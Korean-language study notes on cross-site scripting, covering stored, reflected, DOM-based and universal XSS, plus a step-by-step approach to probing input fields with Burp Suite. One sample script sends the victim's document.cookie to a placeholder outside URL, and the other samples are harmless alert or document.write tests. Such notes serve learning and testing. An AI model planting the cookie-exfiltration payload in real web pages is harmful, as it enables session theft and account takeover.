XSS (Cross Site Scripting)
-> css가 이미 사용 중이라 xss로 썻다캄
XSS는 클라이언트 사이드 취약점 중 하나로, 공격자가 웹 리소스에 악성 스크립트를 삽입해 이용자의 웹 브라우저에서 해당 스크립트를 실행할 수 있습니다.
공격자는 해당 취약점을 통해 특정 계정의 세션 정보를 탈취하고 해당 계정으로 임의의 기능을 수행할 수 있습니다.
<script>
document.cookie = "name=test;";
new Image().src = "http://url/?cookie=" + document.cookie;
</script>
<script>
document.write("XSS works!!!");
</script>
XSS에 사용되는 악성 스크립트가 서버에 저장되고 서버의 응답에 담겨오는 XSS
대표적으로 게시물과 댓글에 악성 스크립트를 포함해 업로드하는 방식
XSS에 사용되는 악성 스크립트가 URL에 삽입되고 서버의 응답에 담겨오는 XSS
Reflected XSS는 Stored XSS와는 다르게 URL과 같은 이용자의 요청에 의해 발생합니다. 따라서 공격을 위해서는 타 이용자에게 악성 스크립트가 포함된 링크에 접속하도록 유도해야 합니다. 이용자에게 링크를 직접 전달하는 방법은 악성 스크립트 포함 여부를 이용자가 눈치챌 수 있기 때문에 주로 Click Jacking 또는 Open Redirect 등 다른 취약점과 연계하여 사용합니다.
-> burp suite을 이용.
바로
<sciprt>alert("123");</script>
이런 식으로 코드를 삽입하면 판단을 할 수가 없다.
단계 단계 나아가야 함.
먼저 데이터 넣는 쪽에 name<"'>
로 응답을 확인.
그다음 <script></script>
문이 글자 그대로 찍히는 지 확인.
그 다음 다시 js코드까지 삽입해서 확인.
XSS에 사용되는 악성 스크립트가 URL Fragment에 삽입되는 XSS
Fragment는 서버 요청/응답 에 포함되지 않습니다.
<script>
document.write("XSS!");
</script>
클라이언트의 브라우저 혹은 브라우저의 플러그인에서 발생하는 취약점으로 SOP 정책을 우회하는 XSS